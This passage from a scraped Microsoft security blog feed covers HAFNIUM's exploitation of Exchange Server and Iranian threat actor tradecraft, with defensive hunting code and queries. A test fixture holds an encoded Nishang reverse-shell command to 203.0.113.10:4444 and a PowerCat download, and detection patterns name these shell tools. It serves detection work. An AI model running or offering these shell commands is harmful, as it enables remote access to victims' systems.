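        except (ValueError, UnicodeDecodeError):
            pass  # not a well-formed encoded command; the raw line is still checked
    return texts

def encode_powershell(script):
    """Build an -EncodedCommand value; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def hunt(events):
    """Summarise hits like the KQL: {(rule, Computer, Account, CommandLine): (FirstSeen, LastSeen)}."""
    seen = {}
    for ev in events:
        if ev["Process"].lower() not in SHELLS or not ev.get("CommandLine"):
            continue
        texts = decode_encoded_commands(ev["CommandLine"])
        for rule, needle in RULES.items():
            if any(needle.lower() in t.lower() for t in texts):
                key = (rule, ev["Computer"], ev["Account"], ev["CommandLine"])
                first, last = seen.get(key, (ev["TimeGenerated"], ev["TimeGenerated"]))
                seen[key] = (min(first, ev["TimeGenerated"]), max(last, ev["TimeGenerated"]))
    return seen

# Constructed SecurityEvent (4688) rows: a PowerCat fetch, an encoded Nishang
# one-liner, the Exchange snap-in loaded twice, and one benign admin script.
SNAPIN_CMD = 'powershell.exe -c "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin; Get-Mailbox"'
SAMPLE_EVENTS = [
    {"TimeGenerated": "2021-03-01T04:01:10Z", "Computer": "EXCH01", "Account": "NT AUTHORITY\\SYSTEM", "Process": "cmd.exe",
     "CommandLine": "cmd /c powershell -c Invoke-WebRequest https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -OutFile C:\\Windows\\Temp\\pc.ps1"},
    {"TimeGenerated": "2021-03-01T04:02:30Z", "Computer": "EXCH01", "Account": "NT AUTHORITY\\SYSTEM", "Process": "powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell('$client = New-Object System.Net.Sockets.TCPClient("203.0.113.10",4444)')},
    {"TimeGenerated": "2021-03-01T04:05:00Z", "Computer": "EXCH01", "Account": "CONTOSO\\svc-backup", "Process": "powershell.exe", "CommandLine": SNAPIN_CMD},
    {"TimeGenerated": "2021-03-01T04:06:00Z", "Computer": "EXCH01", "Account": "CONTOSO\\svc-backup", "Process": "powershell.exe", "CommandLine": SNAPIN_CMD},
    {"TimeGenerated": "2021-03-01T09:00:00Z", "Computer": "WS07", "Account": "CONTOSO\\jdoe", "Process": "powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for (rule, computer, account, cmd), (first, last) in hunt(SAMPLE_EVENTS).items():
        print(f"{rule:22} {computer} {account} first={first} last={last}\n    {cmd[:100]}")
```

The raw-string match alone would miss the second event, whose Nishang one-liner only appears after decoding; the snap-in rule collapses the two identical command lines into one row with first and last seen, the same shape as the summarize in the Sentinel query.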
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script that checks for the HAFNIUM IOCs below and addresses the performance and memory concerns of running the one-line commands against large log sets. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions 
were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * The following PowerShell command queries the Application event log for these entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * The following PowerShell command searches for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. 
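The HttpProxy and ECP log checks described under "Scan Exchange log files for indicators of compromise" above, as an added example that is not part of the original post: a Python triage script for logs exported off the server, applying the CVE-2021-26855 test (empty AuthenticatedUser with a ServerInfo~*/* AnchorMailbox, or a Server~*/*~* BackEndCookie) and the CVE-2021-27065 test (a Set-*VirtualDirectory InternalUrl or ExternalUrl that is not a plain http(s) URI). The log excerpts are constructed; the HttpProxy header is a reduced subset of the real columns and the ECP line layout is assumed, so adapt the column handling to the exported files.

```python
"""Offline triage of exported Exchange logs for two of the indicators above:
unauthenticated HttpProxy requests whose AnchorMailbox or BackEndCookie carries
the ServerInfo~ / Server~ routing pattern (CVE-2021-26855), and ECP log entries
that set a *VirtualDirectory InternalUrl/ExternalUrl to something other than a
plain http(s) URI (CVE-2021-27065). Added example; all sample lines are constructed."""
import csv
import fnmatch
import io
import re
from urllib.parse import urlparse

# Constructed HttpProxy excerpt with a reduced column set (the real files have
# many more columns). Rows 1 and 3 are unauthenticated requests with ServerInfo~
# anchors; row 2 is an ordinary forms-based OWA logon.
SAMPLE_HTTPPROXY = """\
DateTime,UrlStem,AuthenticationType,AuthenticatedUser,AnchorMailbox,BackEndCookie,ClientIpAddress
2021-03-01T03:12:44.120Z,/ecp/y.js,,,ServerInfo~localhost/autodiscover/autodiscover.xml?#,,203.0.113.10
2021-03-01T03:13:01.004Z,/owa/,FBA,contoso\\jdoe,Sid~S-1-5-21-1-2-3-1105,Server~mail.contoso.local~1941128960,198.51.100.7
2021-03-01T03:14:09.551Z,/ecp/default.flt,,,ServerInfo~localhost/ecp/default.flt?#,Server~localhost/ecp/default.flt~0,203.0.113.10
"""

def find_ssrf_entries(log_text):
    """Rows matching the CVE-2021-26855 pattern from the post: AuthenticatedUser
    empty and AnchorMailbox like ServerInfo~*/*, or BackEndCookie like Server~*/*~*."""
    lines = [l for l in io.StringIO(log_text) if not l.startswith("#")]  # skip #-comment headers if present
    hits = []
    for row in csv.DictReader(lines):
        anchor = row.get("AnchorMailbox") or ""
        cookie = row.get("BackEndCookie") or ""
        unauthenticated = not (row.get("AuthenticatedUser") or "").strip()
        if (unauthenticated and fnmatch.fnmatchcase(anchor, "ServerInfo~*/*")) \
                or fnmatch.fnmatchcase(cookie, "Server~*/*~*"):
            hits.append({k: row.get(k, "") for k in
                         ("DateTime", "ClientIpAddress", "UrlStem", "AnchorMailbox", "BackEndCookie")})
    return hits

# Constructed ECP\Server excerpt (layout assumed: timestamp, component, cmdlet).
# Line 1 is a legitimate change; line 2 plants server-side script in ExternalUrl.
SAMPLE_ECP = """\
2021-03-01T03:20:10.000Z,ECP,Set-OwaVirtualDirectory -Identity 'MAIL\\owa (Default Web Site)' -ExternalUrl 'https://mail.contoso.local/owa'
2021-03-01T03:21:33.000Z,ECP,Set-OabVirtualDirectory -Identity 'MAIL\\OAB (Default Web Site)' -ExternalUrl 'http://ffff/#<script language="JScript" runat="server">/* payload omitted */</script>'
"""
SET_VDIR = re.compile(r"Set-\w+VirtualDirectory")
URL_PARAM = re.compile(r'''-(InternalUrl|ExternalUrl)\s+(?:'([^']*)'|"([^"]*)"|(\S+))''', re.IGNORECASE)

def is_plain_uri(value):
    """True only for an http(s) URL with a host and no markup or script tag in it."""
    if "<" in value or ">" in value or "<script" in value.lower():
        return False
    parsed = urlparse(value)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)

def find_vdir_script(log_text):
    """(cmdlet, parameter, value) for every Set-*VirtualDirectory URL that is not a plain URI."""
    hits = []
    for line in log_text.splitlines():
        cmd = SET_VDIR.search(line)
        if not cmd:
            continue
        for m in URL_PARAM.finditer(line):
            value = m.group(2) or m.group(3) or m.group(4) or ""
            if not is_plain_uri(value):
                hits.append((cmd.group(0), m.group(1), value))
    return hits

if __name__ == "__main__":
    for hit in find_ssrf_entries(SAMPLE_HTTPPROXY):
        print("CVE-2021-26855 candidate:", hit)
    for hit in find_vdir_script(SAMPLE_ECP):
        print("CVE-2021-27065 candidate:", hit)
```

The ECP check is deliberately stricter than the Select-String one-liner above, which lists every Set-*VirtualDirectory call: a legitimate administrative change is reported only when the URL value itself is not a clean http(s) URI, which is what the "should only be valid Uris" guidance reduces to.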
This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * 
[Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File 
Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting 
queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. 
We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. 
PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN appliances that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyLogon ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were suitable for actions on objectives. On select victims, operators created local administrator accounts with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. 
On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSPHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. 
The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed this playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar to the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications, which allows them to build trust and confidence with the target. 
In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. 
For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. 
Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-03-19T22:36:39", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation 